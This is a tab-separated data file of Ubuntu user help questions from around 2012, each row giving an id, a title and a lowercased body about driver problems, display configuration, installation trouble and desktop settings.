191435	any kinect mouse control software out there ?	i 've been researching this for a while and ca n't seem to find a lot of info . are there any complete solutions out there for controlling ubuntu and more specifically the cursor with an xbox kinect ? i found a few projects where left clicking is available by hovering over a clickable object , but what about double clicking , right clicking etc ? another solution i 'd be happy with would be to create a touch surface on the desk in front of the pc so i can control the cursor and use multiple fingers for right click , tap twice for double , drag down or up for scrolling etc ... basically a large touchpad . any ideas ?
191440	configure hosts file to use aliases	i am running ubuntu desktop 12.04 and would like to be able to open a web browser ( firefox ) , type an alias into the address bar , hit enter , and have the browser take me to the site that the alias references . for instance , i 'd like to be able to type in `` so '' and have it take me to http : www.stackoverflow.com , etc . i realize this is what `` favorties '' or `` bookmarks '' already do , however , this is like the text-only , command-line version of those tools . i suspect i have to configure something equivalent to a windows host file , but since i 'm so new to linux/ubuntu , i do n't know what that equivalent is , or if this is even possible to do . thanks in advance !
191441	ca n't shutdown ubuntu ( wubi installation )	i downloaded ubuntu 12.04 using wubi . the installation went correctly and everything was working fine until i tried to shutdown . i clicked shutdown and then ubuntu started shutdown , but as soon as i saw the ubuntu logo with blank dots under , it froze . i had to perform a hard shutdown . after booting my computer back and going into ubuntu , i tried shutting it down again but this time it took me on a black page with lots and lots of log writing on the screen and after a little while , it stopped writing stuff . i was able to input characters using the keyboard and everything , but it never shutdown . i had to perform a hard shutdown again . now it always gives me a ubuntu logo and freezes . what should i do ? i know hard shutdowns are bad and want to avoid them . is there anyway to make shutdowns work ? i tried a reboot and it also froze on the ubuntu logo . sony vaio model e sve17115fdb laptop . graphic card - amd radeon hd 7650m ( and it installed correctly in ubuntu ) . bios - h2o bios . processor - intel i7-3612qm . edit : i only installed the amd/ati proprietary drivers fglrx , not the amd/ati post release drivers because they keep showing an error message . here is jockey.log . edit 2 : here is the log that i mentioned before that appeared on my screen , it appeared after i tried reinstalling my amd driver but failed so i reinstalled the other one . sorry for the quality i took those pictures with my phone . edit 3 : this problem is indeed caused by fglrx ( not the post-release one ) , i uninstalled it and my computer shutdowned wihtout a single problem , but i need those drivers to be able to change the brightness of my computer and without them ubuntu is really , really slow . is there anyway to fix this package ?
191442	how to install libquadmath0 in 10.04 ?	to compile a package i need to install libquadmath0 under gcc4.4 10.04 lts . i have not found any source . any help ?
191443	how to limit xen dom0 ram to a certain amount ?	how to limit xen dom0 ram to a certain amount ? when there was grub1 and a grub.cfg , i knew how , just add to the kernel options there . now i have no clue . i have tried setting grub_cmdline_linux_default= '' nomodeset dom0_mem=640m , max:640m '' in /etc/default/grub but no effect , dom0 still uses all ram .
191446	permission denied when other users create files	i have messed up my home directory . i 'm using dash as my shell and by myself i can create files just fine , but others ca n't . i do n't think that made sense as it 's kind of hard to explain , so hopefully this can enlighten you : alex @ ubuntu : ~ $ ls -l total 4 drwxrwxrwx 2 alex www-data 4096 sep 21 17:55 public_html alex @ ubuntu : ~ $ git clone git : //github.com/twitter/bootstrap fatal : could not switch to 'bootstrap ' : permission denied alex @ ubuntu : ~ $ chmod 777 . alex @ ubuntu : ~ $ git clone git : //github.com/twitter/bootstrap fatal : destination path 'bootstrap ' already exists and is not an empty directory . alex @ ubuntu : ~ $ rm -rf bootstrap alex @ ubuntu : ~ $ git clone git : //github.com/twitter/bootstrap fatal : could not switch to 'bootstrap ' : permission denied alex @ ubuntu : ~ $ chmod -r 777 * alex @ ubuntu : ~ $ git clone git : //github.com/twitter/bootstrap cloning into 'bootstrap ' ... /home/alex/bootstrap/.git/refs : permission denied alex @ ubuntu : ~ $ ls -l .. total 4 drwxrwxrwx 3 alex alex 4096 sep 21 18:07 alex alex @ ubuntu : ~ $ not sure what i 've done wrong or if it relates to my umask , but any advice is welcome . thanks !
191449	how do i install kde 3.5 or tde ?	i have a machine with low memory , i 'm using ubuntu 12.04 with classic gnome , but i would like to install kde 3.5 or tde ( fork ) .
191450	configurating man page to work like `` man xxx ''	i made a application in c. i wrote a manpage for this program and it 's called something like edit.1 . i `` compiled '' groff -man -tascii edit.1 | less now i can start it like man ./edit.1 from the main project file of the application but i want to start it like man edit i know that i just could put it into usr/local/share/man/man1 but the program will be used by many users who re installing the program on their own system . how can i set it up that every user can just input man edit ?
191451	sound not working with some applications ; it does work with others ... what 's going on ?	this morning , i was on my computer ( watching youtube videos and listening to music ) everything was fine . that update window came up , so i updated and restarted ( it said i had to ) but when i logged back in , sound on youtube was n't working . ( my music player qmmp was still working ) i decided to deal with it later since i had some stuff to do , then i realized that my music player had stopped working too . i 've tried various things that people have suggested for no sound , like uninstalling and reinstalling alsamixer , pulseaudio , etc . but none of those have fixed the problem . now , i notice that my music player works again , but here 's the weird thing : if i open system settings and click `` sound , '' it stops as soon as the sound settings window opens . if i close the sound settings window , close the music player , and reopen it , it works again . is anyone else having problems like these ? could it be a bug in the update or something ?
191458	use tv ( hdmi ) with non-square pixels	i am having a problem when i connect my lg plasma tv ( with a native resolution of 1024x768 pixels ) to my 12.04 laptop using hdmi . the pixels ( actual pixels , not the signal ) of my tv are physically stretched so it gets his 16:9 ratio . in other words the pixels are rectangular ( 1.3333x1 ) . everything i display from my laptop oviously get stretched ( 4:3 stretched to 16:9 ) . there is a different dpi in x and y needed for it to display properly ( some kind of anamorphic mode ) . default ubuntu uses a dpi of 96x96 . i can change it using xrandr , but only square eg 100x100 or 70x70 . already looked here , but it seems ubuntu totally ignore the displaysize in xorg.conf when i use the code below to see the dpi and nothing i do changes it . the displaysize also stays the same ( calculated using 96 dpi and the resolution ) xdpyinfo | grep -b2 resolution i use the propretary ati drivers for my ati mobility radeon hd 50xx but it is the same with the radeon drivers . my temporary solution is to use : xrandr -- output dfp1 -- mode 1024x768 -- scale 1.333333333333x1 -- output lvds -- off but with this the right side of the screen is nog accesable . this is a known problem with xrandr -- scale and ubuntu . this is because of a patch for the mouse/windows not going outside the screen . i search a way to change the displaysize or the dpi ( to something not square like 128x96 ) when i connect the display .
191461	how i can remove date time metadata from my libreoffice comments ?	is there a way to control the metadata that is saved in a libreoffice document ? i want to : add comments of my own . prevent date and time metadata from being saved .
191463	eject unreadable dvd from slot-in drive	i have an external usb dvd slot-in drive . it does not have any eject buttons . i inserted a dvd which ca n't be read ( too many scratches i guess ) . now i do not know how i can eject the disc - as there is no media yet recognized , i do not get a drive mapping , so eject does not do much . dmesg output : [ 80954.473663 ] usb 2-1.3.2.1 : new high-speed usb device number 8 using ehci_hcd [ 80954.571274 ] scsi1183 : usb-storage 2-1.3.2.1:1.0 [ 80955.570242 ] scsi 1183:0:0:0 : cd-rom matshita dvd-r uj-898 hc10 pq : 0 ansi : 0 [ 80955.583425 ] sr0 : scsi3-mmc drive : 24x/24x writer cd/rw xa/form2 cdda tray [ 80955.583774 ] sr 1183:0:0:0 : attached scsi cd-rom sr0 [ 80955.584018 ] sr 1183:0:0:0 : attached scsi generic sg3 type 5 sudo cdrecord -eject sg3 wodim : no write mode specified . wodim : assuming -tao mode . wodim : future versions of wodim may have different drive dependent defaults . device was not specified . trying to find an appropriate drive ... wodim : no such file or directory . can not open scsi driver ! for possible targets try 'wodim -- devices ' or 'wodim -scanbus ' . for possible transport specifiers try 'wodim dev=help ' . for ide/atapi devices configuration , see the file readme.atapi.setup from the wodim documentation . and -- devices and -scanbus do not show the drive .
191466	ubuntu server 12.04.1 black screen after selecting `` install ubuntu ''	i 've been trying to install ubuntu server for a few days now on a brand new server i just bought , but it 's not working . every time i boot to the usb i 'm using to install it and select `` install ubuntu server '' , the screen goes black and either restarts or locks . i can get to the initial screen where it asks you to enter your language , and then the screen where it asks you what you want to do . i 've tried the memory test and that also works fine . i 've read a couple of other posts saying to select acpi=off and nomodeset , but neither of those work either . what should i do ? i really need this to work . oh yeah , and my server specs are listed below as well . server specs : 500 gb hdd 32 gb of ram 2 intel processors running at 5.0 ghz
191467	apt link is not working in opera browser	opera web browser is not working with apt : links . is there any solution for this problem ? i downloaded this opera 32 bit deb from their website and my distro is ubuntu 12.04 .
191477	how do i turn off alt-` for switching between application windows ?	how do i turn off alt-` in unity for switching between application windows ? i 've already disabled using alt to show the hud , and i 've disabled the unity switcher in favor of the static switcher .
191481	setting permission for executable file output of gcc	i m pretty new to linux and gcc . i have a file1.s file which i tried to build using gcc with following command - gcc -m32 -o file1 file1.s runtime.c compilation was successful and i got the file1 , but on issuing ./file1 does nothing . when i checked the file permissions , i see that for user , only read and write are enabled , executable is set as - . i tried doing chmod u+x file1 , but that didnt change any permission . where am i going wrong ? how do i execute this file1 ? it would just print the sum of two numbers . thanks !
191483	how do i format the output of nmap to display on conky ?	i want to add to the network section of conky a list of all hosts and ips for my network . however i do not know how to format the output in a way i like . i want live hosts however this is on the bottom line of nmap 's output ) host ( ip ) host ( ip ) and on and on ... i think there should be a max of 7 on my network . how can i do this ? the output of nmap -sp 192.168.1.0/24 looks nothing like what i want though it does have all the parts , just in the wrong order .
191484	not all the icons have changed after installing a new icon theme in lubuntu	i have installed an icon theme in lubuntu . icons have changed but not every icon . folder icons are the same but there are many more icons for music folder , video folder etc . opera has new icon , but they did n't change . what should i do to change all the icons from the new icon theme ? i am using pcmanfm as my file manager in lubuntu .
191487	wireless link is blinking continuously even when i am using wired connection	my laptop wireless is blinking continuously even when i am using wired connection . i disabled the wireless but it 's not working . ibm t42 1 gb ram 1.7 ghz intel processor inter pro wireless card
191491	unable to load graphic environment , an x server problem	i have just installed ubuntu-desktop from command line , since an error during installation had me stuck on it . now i 'm still stuck there : if i try to boot normally , there will be just a blank screen , not even the splash screen . if i use startx it terminates with error , saying `` unable to connect to x server : no such file or directory '' . if i use xorg -configure , it throws `` no devices to configure , configuration failed '' . do you think is a problem with the drivers or something ? please help me . thank you .
191495	how to make ubuntu update the kernel less frequently ?	recently ubuntu updates the linux kernel very frequently . most of the times it 's actually the same version that is being installed ( probably slightly different super minor version number ) . normally , this should be a good thing , but for me , each kernel update means i have to drop to tty , stop lightdm , rebuild my nvidia driver , start lightdm again and login . then i have to rebuild and reinstall my ndiswrapper module . it 's easy , but it 's annoying . i know i can make updates less frequent in general , but i still want to get the other updates . i do n't want to stop updating the kernel altogether either . i am looking for a way to tell ubuntu to update the linux kernel less frequently , or even better , to tell it to update the linux kernel only if the minor number of the version changed . is this at all possible ?
191499	can i install ubuntu on the same hard drive i booted with ?	i booted ubuntu using an external hard drive . is it possible to install it on the same hard-drive without unplugging or turning it off ? i only have one working usb port and the internal pc hard-drive is dead .
191503	dual monitor display 12.04 ?	i have 2 beautiful 27 '' asus monitors . i started trying out ubuntu 12.04 and now only one works and thats vga . any help here cause i 'm stumped . i have a bfg tech nivida geforce 8800 gt 512mb and i 'm trying to fix this . i get this error when i try to configure the xorg file : failed to set metamode ( 1 ) 'dfp-0 : 1280x1024 @ 1280x1024 +0+0 , dfp-1 : 1280x1024 @ 1280x1024 +1280+0 ' ( mode 2560x1024 , id : 50 ) on x screen 0 . this is the xorg.conf : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 295.33 ( buildd @ allspice ) fri mar 30 15:25:24 utc 2012 section `` serverlayout '' # removed option `` xinerama '' `` 1 '' # removed option `` xinerama '' `` 0 '' # removed option `` xinerama '' `` 1 '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputclass '' identifier `` mouse remap '' matchproduct `` saitek cyborg r.a.t.7 mouse '' matchdevicepath `` /dev/input/event* '' option `` buttonmapping '' `` 1 2 3 4 5 6 7 8 9 0 0 0 0 0 0 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor1 '' vendorname `` unknown '' modelname `` ancor communications inc ve247 '' horizsync 30.0 - 83.0 vertrefresh 50.0 - 76.0 option `` dpms '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` ancor communications inc ve247 '' horizsync 30.0 - 83.0 vertrefresh 50.0 - 76.0 option `` dpms '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` quadro fx 1500 '' busid `` pci:1:0:0 '' screen 1 endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` quadro fx 1500 '' endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` dfp-1 '' option `` metamodes '' `` dfp-1 : 1280x1024 +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' # removed option `` twinview '' `` 0 '' # removed option `` metamodes '' `` dfp-0 : 1280x1024 +0+0 '' # removed option `` twinview '' `` 1 '' # removed option `` metamodes '' `` dfp-0 : 1280x1024 +0+0 , dfp-1 : 1280x1024 +1280+0 '' # removed option `` twinview '' `` 0 '' # removed option `` metamodes '' `` dfp-0 : 1280x1024 +0+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 1 '' option `` twinviewxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` dfp-0 : 1280x1024 +0+0 , dfp-1 : 1280x1024 +1280+0 ; dfp-1 : 1280x1024_60 +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` extensions '' option `` composite '' `` disable '' endsection
191507	why does microsoft excel change the characters that i copy into it ?	i live in spain and i am using the english version of microsoft excel installed with wine on ubuntu . the problem is that i use my laptop at work and when i copy text into excel ( text that is spanish ) the characters that are spanish ( such as é , ñ , á ... etc ) are changed into weird characters . how can i sort this out ? for example : martínez josé ... .appears as `` martã­nez josã© '' in my spreadsheet and i really cant have it this way or my boss will kill me . : )
191511	ubuntu installer does not show drives	i am trying to install ubuntu 12.04 lts on my inspiron laptio , but the installer does not show any drives . my system has a 1tb sata drive and a 32gb ssd . as far as i can figure , the boot files are kept on the ssd for fast startup ( for windows ) . during win7 installation , i had to manually load drivers for raid controller to see all available drives . running fdisk -l from the live cd shows the following : ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x234b4782 device boot start end blocks id system /dev/sda1 63 80324 40131 de dell utility /dev/sda2 * 81920 41627647 20772864 7 hpfs/ntfs/exfat /dev/sda3 41627648 357019647 157696000 7 hpfs/ntfs/exfat /dev/sda4 357019648 1953517567 798248960 f w95 ext 'd ( lba ) /dev/sda5 672415744 1312966655 320275456 7 hpfs/ntfs/exfat /dev/sda6 1312968704 1953517567 320274432 7 hpfs/ntfs/exfat disk /dev/sdb : 32.0 gb , 32017047552 bytes 255 heads , 63 sectors/track , 3892 cylinders , total 62533296 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x234b474b device boot start end blocks id system /dev/sdb1 2048 16775167 8386560 84 os/2 hidden c : drive ubuntu @ ubuntu : ~ $ in the ubuntu installer , i can only choose /dev/sdb for `` device for boot loader installation '' , and sdb does n't show any drives . i can not select /dev/sda . any ideas anyone ? thanks .
191519	mismatch of packages to be updated between update manager ( gui ) and apt-get ( cli )	i noticed my system acting weird today . while the update manager ( gui application ) states that there are 14 updates selected , and 52 mb will be downloaded , the apt-get upgrade command only informs me of 1 update to be downloaded and installed . the update manager gui ( output ) can be found here : and the cli apt-get upgrade output here : fokis @ fokis-netbook : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : ginn libgrip0 linux-generic linux-headers-generic linux-headers-generic-pae linux-image-generic the following packages will be upgraded : linux-libc-dev 1 upgraded , 0 newly installed , 0 to remove and 6 not upgraded . need to get 866 kb of archives . after this operation , 2,048 b of additional disk space will be used . do you want to continue [ y/n ] ? n abort . note : i have run apt-get update before apt-get upgrade in the command line . what is it that i am doing wrong ?
191521	how to convert ac3 to flac and apply a delay ?	i have a mkv video file . the audio track is ac3 . i extracted the ac3 and now want to convert it to flac . but i need to add a delay/offset of 150ms . the offset should be permanent ; the actual duration of the resulting flac should be 150ms longer than the ac3 input . what is the command line to do this ? thank you in advance .
191524	set default printer settings libreoffice	although i set the default printer settings through the `` printing '' manager to notumbleduplex , the libreoffice print dialog properties is n't defaulted as notumbleduplex . how can i set the notumbleduplex setting as default on libreoffice ?
191527	disable auto-opening nautilus window after auto-mount	every time i plug a usb stick in , nautilus opens a new window with the contents of the drive . i would like to disable this auto-opening of the nautilus window , but i would like the actual auto-mount to keep working . is this possible ?
191533	change default 'print screen ' save folder	the print screen window that appears when pressing the imprpant button ( at least , that 's what it 's called in my keyboard ) has the `` save folder '' set to /home/myusername/ by default . i 'd like to change that folder so that /home/myusername/downloads/is the default , but there are no options available that i can see . how can i do this ?
191536	how can i shutdown from the command line using lightdm ?	in gdm i could use os.system ( `` gdm-control -- reboot & & openbox -- exit '' ) in a python script . what would the command be for lightdm ?
191537	dell inspiron 6000 wireless firmware missing	wireless worked in previous versions of ubuntu , but after upgrading i ca n't connect to my wireless . dell inspiron 6000 service tag 8dytn71
191538	how do i compile just wireless drivers in kernel ?	i have patched a file for my wifi driver in net/wireless/drivers/zd1211rw/ , and i could n't get it to compile just that driver . so i backed up into the main directory of my linux kernel source , and issued the command make modules . it is taking forever , even though i have a quad core , so is there any way i can tell it specifically to just compile the wireless drivers ? or even just zd1211rw ? thanks . i have 3.2.0 .
191541	xubuntu 12.04 ca n't change desktop background/wallpaper permanently	if i change the desktop background ( wallpaper ) via right-click on desktop = > desktop settings = > single image , and select another background image from the list , or add a photo of my own ( via the `` + '' symbol ) , i can actually change the background image , but after logging out or restarting , the wallpaper is always reset to the original xubuntu 12.04 background . so , basically , i ca n't find a way to permanently change the desktop background . any ideas ?
191545	sorting music into folders by metadata	i thought this would be easier to find but i have tried a number of programs and none seem to be able to do this the way i want . basically i want to be able to sort a mass of .mp3s into a specific folder on an external drive , separated and named by metadata . i used foobar2000 on windows to do this and it was perfect for my needs , the closest i 've come on ubuntu was picard but , i ca n't get it to work with music not in the musicbrainz db , as i listen to a lot of mixtapes and live cuts so that is n't very helpful . i want something with an output like `` external hdd/artist/album/ ( tracknumber ) title '' ( for example : '' external hdd/nas/illmatic/ ( 01 ) the genesis '' ) . any help would be greatly appreciated .
191547	banshee amazon mp3 integration broken	amazon have introduced their new amazon cloud player , bang goes banshee 's amazon mp3 download support . it really was an itunes killer for me , but hey life sucks . will banshee support the new amazon site ? do the dev 's have anything up their sleeves ? or are their hands tied ?
191550	how to setup dual-screen monitors in xorg.conf using nvidia twinview ?	i have the following xorg.conf file , but twinview is not working for me when using 2 monitors . please help me get things sorted out . # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 295.33 ( buildd @ allspice ) fri mar 30 15:25:24 utc 2012 section `` serverlayout '' # removed option `` xinerama '' `` 1 '' # removed option `` xinerama '' `` 0 '' # removed option `` xinerama '' `` 1 '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor1 '' vendorname `` unknown '' modelname `` ancor communications inc ve247 '' horizsync 30.0 - 83.0 vertrefresh 50.0 - 76.0 option `` dpms '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` ancor communications inc ve247 '' horizsync 30.0 - 83.0 vertrefresh 50.0 - 76.0 option `` dpms '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` quadro fx 1500 '' busid `` pci:1:0:0 '' screen 1 endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` quadro fx 1500 '' endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` dfp-1 '' option `` metamodes '' `` dfp-1 : 1280x1024 +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' # removed option `` twinview '' `` 0 '' # removed option `` metamodes '' `` dfp-0 : 1280x1024 +0+0 '' # removed option `` twinview '' `` 1 '' # removed option `` metamodes '' `` dfp-0 : 1280x1024 +0+0 , dfp-1 : 1280x1024 +1280+0 '' # removed option `` twinview '' `` 0 '' # removed option `` metamodes '' `` dfp-0 : 1280x1024 +0+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 1 '' option `` twinviewxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` dfp-0 : 1280x1024 +0+0 , dfp-1 : 1280x1024 +1280+0 ; dfp-1 : 1280x1024_60 +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` extensions '' option `` composite '' `` disable '' endsection here are my computers specifications : computer : processor : 2x intel ( r ) pentium ( r ) 4 cpu 3.00ghz memory : 3339mb ( 2889mb used ) operating system : ubuntu 12.04.1 lts user name : chikaru ( mrmagu ) date/time : sat 22 sep 2012 12:18:13 pm edt display : resolution : 2560x1024 pixels opengl renderer : quadro fx 1500/pcie/sse2 x11 vendor : the x.org foundation multimedia : audio adapter : sb-xfi - creative x-fi audio adapter : hda-intel - hda intel audio adapter : usb-audio - producer usb input devices : sleep button power button razer razer lycosa razer razer lycosa saitek cyborg r.a.t.7 mouse hda intel front headphone hda intel rear mic hda intel line hda intel line-out front printers : no printers found scsi disks : optiarc dvd rw ad-5200a benq dvd ls dw1655 ata st380817as ata mdt md1600js-00s ata hitachi hds72303 ata st3320820as
191553	i accidentally deleted the contents of .gnome2 folder in ubuntu 12.04 , can i recover ?	the following were deleted ... how worried should i be ? accels/nautilus , directory : accels , keyrings/user.keystore , keyrings/user.keystore.46sn8v , keyrings/login.keyring , directory : keyrings , directory : nautilus-scripts
191556	unity , gnome-shell and cinnamon do n't have their top panel after removing lubuntu	using ubuntu 12.04 . first it came with unity , then with a zeal of trying other desktop environments and i have installed gnome-shell and no conflicts , works fine . then i have gone through lubuntu and xubuntu as well . but some panel problem started with lubuntu raised and i have removed lubuntu de from my pc . but that thing got conflicted with my unity , gnome and cinnamon & they are not working . these three are not having only of their panels . i just see any empty desktop . currently only kde and xfce can run fine with my ubuntu 12.04 . but i want to get back with unity , gnome and cinnamon also . this is how my desktop look like
191557	lan data transfer	i would to know how can i transfer data using lan from an ubuntu machine to another ! i am using a wireless router , obviously , i can see mine in the windows network but i guess i must do something else . thank you
191558	how do i install ubuntu 12.04 over windows hp	i have an hp desktop amd 64 6-core processor 10gb ram 1.5tb hdd and windows 7 installed . i downloaded the 12.04 iso and burned to a dvd . i want to install ubuntu over windows . i have recovery cd 's made in case ubuntu is n't for me and my family . during the install it says no root file system is defined please correct this from the partitioning table . in the box where i should be able to choose a partition , none are available to choose from , it is blank . i know that hp has decided to use 4 partitions . how do i go about deleting all the partitions using the livecd ? i 've never used gparted before and am a bit lost when it comes to anything to do with partitions . after following your directions completely , when i choose to install , i still have the same problem . no partitions show up to install from . it 's just a blank box and i still get the same error . in gparted it show : partition file system label size used unused flags unallocated unallocated 698.64 - - /dev/sda1 ext2 / 698.63 11.03gib 687.60 boot unallocated unallocated 2.49 - - i close out gparted and then click install ubuntu on the desktop . it asks me to choose a language , make sure i 'm connected to the net , download updates , install 3rd party software . i click next . then the option to choose where to install it comes up , however there is nothing to choose from . at the bottom it says /dev/sda . i click install and it gives me the error `` no root partition is selected check your partition table '' ? ? ? i am not getting an installation type choice on the third screen . i do not know how to take screen shots of what i am doing either , so i am doing my best to spell out what is happening : on the desktop i open the shortcut that says `` install ubuntun 12.04.1 lts . the first screen that appears says welcome and it asks me to choose a language . i select english and click continue . screen 2 says preparing to install ubuntu . for best results please ensure that this computer has at least 4.5 gb of available space - check is connected to the internet - check download updates while installing - checked the box install 3rd party software ... mp3 , flash etc ... - checked the box screen 3 says installation type . there is a box that apparently should show where the os is going to be installed to . the top of the box says device , type , mount point , format ? size , used below that is a large empty space towards the bottom there are buttons `` new partition table ... add ... change ... below that it says device for boot loader installation : /dev/sda then on the bottom right of screen is quit , back , install now . the first two buttons at bottom are obvious , but when i click `` install now '' i get the following error : no root file system is defined . please correct this from the partitioning menu .
191559	system requirements for ubuntu 12.0x ?	i just want to know what are the minimum system requirements for ubuntu 12.x in general ! please help me a be specific , because other answer only pertain to other people 's computer systems .
191560	updated version of adobe reader	i 'm not sure if this has been answered already ... anyhow , i 'm placing this question , so you could help . i 've been a pc user for as long as i can remember , and i 've just migrated to ubuntu . so far the product has delivered the satisfaction i am expecting . however , there is one program that i 'll need to ensure my productivity -- an updated version of the adobe reader . is there any way i could get this program via ubuntu , without using wine ? please let me know ... thanks !
191561	how to update gtk-3.4 themes to the new gtk-3.6	is it too complicated to achieve ? if it 's not could you tell me how , please . i have some basic knowledge about gtk and css . also , is this going to continue happening each time gnome releases a new version ?
191563	how to view the dns address assigned by dhcp ?	how to view the dns address assigned by dhcp ? ifconfig can not show it . $ ifconfig -a eth0 link encap : ethernet hwaddr 90 : e6 : ba:22:6a : f2 inet addr:192.168.1.111 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :92e6 : baff : fe22:6af2/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:224856 errors:0 dropped:0 overruns:0 frame:0 tx packets:220040 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:166848627 ( 166.8 mb ) tx bytes:20256333 ( 20.2 mb ) interrupt:46 base address:0x4000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:5889 errors:0 dropped:0 overruns:0 frame:0 tx packets:5889 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:468885 ( 468.8 kb ) tx bytes:468885 ( 468.8 kb ) wlan0 link encap : ethernet hwaddr 00:26:5e : e8:4f:8e broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b )
191565	ubuntu keeps asking me for an authentication code when i download anything	im currently trying to download dropbox , but it 's asking for a `` password '' that was not given to me as the download should n't require an authentication code , i 've been running into this problem alot but i absolutely need dropbox working by tomorrow . please help !
191573	how can i reconnect to a ssh session after a broken pipe ?	so i was running apt-get upgrade on a server when the router decided it had been too long since it last made me angry : it dropped all connection . moral of the story is to use screen a lot when you 're on a bum router . anyway , i logged back in and found in htop that the process was still hanging there , still waiting for my y/n to upgrade ( had n't hit it yet , luckily ) . is there any way i can reattach to a session that had been broken off ? i ended up just killing it since it was n't in the middle of package management but it would be great to know for future reference .
191574	is there a keyboard shortcut to open dash previews ?	you can open e.g . a preview of a file in the file lens right clicking with your mouse . is there a keyboard shortcut to use instead of the right click ?
191575	how do i access windows folder from ubuntu ?	i am using ubuntu 12.04 side by side with windows 7 . i installed ubuntu in a drive which also contained windows folder . but the drive is not shown in ubuntu ! how do i access that folder ? thank you .
191579	how to change pdf background color in evince ?	white background color is harm to eyes . how to change pdf background color in evince ? now i use evince 3.4.0 in ubuntu 12.04 x64 .
191581	which free vpn providers support ubuntu ?	ca n't find any free vpn provider for ubuntu . i tried looking into old questions but they seem to be outdated .
191583	how to remote into windows 7 through virtualbox on ubuntu 12.04 from outside the network	i have ubuntu 12.04 installed with virtualbox 4.1.12 . i have a windows 7 professional 32-bit virtualmachine with a bridged network adapter inside virtualbox . i 've given a static ip to this machine with all ports open on both host and virtual machine ( for now ) but people outside of my network ca n't remote into the virtual machine , just the host . if they are on my network they 're able to remote in just fine . what am i missing to allow the outside connections into the virtual machine ( remote display was way too slow ) . host 's internal ip : 192.168.2.151 port : 3389 -- - virtual machine 's internal ip : 192.168.2.155 -- - port : 10155
191587	12.04 does n't recognize my wifi broadcom bcm94318mpg	i have a gateway mx6436 with a broadcom bcm94318mpg wifi . everything else works fine but ubuntu does n't recognize my wifi . it says it does n't have the firmware . what to do ? please help .
191589	how do i install clipgrab ?	i am having issues downloading the newest version of clipgrab http : //clipgrab.de/en . i tried to install it in the terminal , and tried finding the software in ubuntu software center . i have even tried to extract the folder for which the software is in at with no luck . when trying to install in the terminal it gives me an error about my ppa . no downloadable video could be found . this is what happens when i try to download clip grab . i open it up , and then the web page pops up every time i try to use this program ... .every time , and i have removed the old version , put the new version in ... ..still no luck . i love this program , it has worked for several months , and this is annoying that i can not use this program now .
191592	no detection of windows 7 installed already	when i am trying to boot my pc with ubuntu via bootable usb , it says it does n't detect any os installed and asks to install it on whole hard disk . i want to install it along side my windows 7 os . boot info here .
